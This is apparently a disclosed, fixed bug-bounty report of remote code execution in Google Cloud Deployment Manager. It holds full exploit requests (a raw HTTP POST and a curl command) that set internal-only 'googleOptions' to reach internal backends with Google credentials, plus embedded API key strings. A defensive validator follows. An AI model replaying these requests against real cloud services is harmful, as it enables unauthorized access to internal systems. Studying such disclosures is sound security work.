other in Cloud DM

Reported by: Ezequiel Pereira

Google VRP

  • triaged

  • accepted

  • fixed

reward decided

$31,837

Summary: RCE in Google Cloud Deployment Manager

Create a Type Provider like this:

POST /deploymentmanager/staging_dogfood/projects/the-expanse/global/typeProviders HTTP/1.1
Host: www.googleapis.com
Authorization: Bearer <TOKEN>
Content-Type: application/json
Content-Length: 761

{
  "name": "hack",
  "descriptorUrl": "https://test-appengine.sandbox.googleapis.com/$discovery/rest?key=AIzaSyDrGwinQGYOyRu_QcMyYMEtsx3OMwoLuck",
  "options": {
    "inputMappings": [
      {
        "fieldName": "Authorization",
        "methodMatch": ".*",
        "value": "$.concat(\"Bearer \", $.googleOauth2AccessToken())",
        "pythonValue": "",
        "location": "HEADER"
      }
    ]
  },
  "googleOptions": {
    "gslbTarget": "blade:apphosting-admin-nightly",
    "descriptorUrlServerSpec": "blade:apphosting-admin-nightly",
    "injectProject": true,
    "ownershipKind": "GOOGLE",
    "credentialType": "GAIAMINT",
    "transport": "GSLB",
    "deleteIntent": "CREATE_OR_ACQUIRE",
    "isLocalProvider": false
  }
}

# The same kind of request sent with curl (token, descriptor URL and GSLB target are placeholders)
AUTH='Authorization: Bearer <TOKEN>'
DESCRIPTOR='http://example.com/any/path?and=param'

curl -XPOST \
  'https://www.googleapis.com/deploymentmanager/staging_dogfood/projects/sdcpocs/global/typeProviders?key=AIzaSyAa8yy0GdcGPHdtD083HiGGx_S0vMPScDM' \
  --header "$AUTH" \
  --header 'Accept: application/json' \
  --header 'Content-Type: application/json' \
  --data '{"name":"hack3","descriptorUrl":"'"$DESCRIPTOR"'","googleOptions":{"gslbTarget":"ANYGSLBTARGET","descriptorUrlServerSpec":"ANYGSLBTARGET","injectProject":true,"ownershipKind":"GOOGLE","credentialType":"GAIAMINT","transport":"GSLB","deleteIntent":"CREATE_OR_ACQUIRE","isLocalProvider":false}}'

Then you can read the response on the operation selfLink (but if you do a full target, you can also read any other response).
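
A server-side check for the request bodies shown above, added here as an example; it is not part of the original report and not Google's code. It assumes `googleOptions` is reserved for the operator's own providers and that the public fields are the other top-level keys seen on this page; `check_type_provider` and both field sets are hypothetical names.

```python
import json

# Assumption: fields an external caller may set, taken from the request bodies
# on this page minus googleOptions. This is not the service's real schema.
PUBLIC_FIELDS = {"name", "descriptorUrl", "options"}
# Assumption: googleOptions is reserved for the operator's own providers.
INTERNAL_FIELDS = {"googleOptions"}


def _norm(key: str) -> str:
    # Fold case and underscores so google_options is treated as googleOptions.
    return key.replace("_", "").lower()


def _reject_duplicates(pairs):
    # json.loads silently keeps the last duplicate key; fail closed instead.
    seen = set()
    for key, _ in pairs:
        if _norm(key) in seen:
            raise ValueError(f"duplicate field: {key}")
        seen.add(_norm(key))
    return dict(pairs)


def check_type_provider(raw: str, caller_is_internal: bool = False) -> list:
    """Return reasons to reject a typeProviders create body; [] means accept."""
    try:
        body = json.loads(raw, object_pairs_hook=_reject_duplicates)
    except ValueError as exc:  # also covers json.JSONDecodeError
        return [f"unparseable body: {exc}"]
    if not isinstance(body, dict):
        return ["body must be a JSON object"]
    public = {_norm(f) for f in PUBLIC_FIELDS}
    internal = {_norm(f) for f in INTERNAL_FIELDS}
    reasons = []
    for key in body:
        if _norm(key) in internal:
            if not caller_is_internal:
                reasons.append(f"internal-only field from external caller: {key}")
        elif _norm(key) not in public:
            reasons.append(f"unknown field: {key}")
    return reasons


# Constructed sample shaped like the second request on this page.
SAMPLE = ('{"name":"hack3","descriptorUrl":"http://example.com/any/path?and=param",'
          '"googleOptions":{"gslbTarget":"ANYGSLBTARGET","transport":"GSLB"}}')

print(check_type_provider(SAMPLE))
```

The check runs before the body reaches any backend parser, so the filter and the backend cannot disagree about which fields are present.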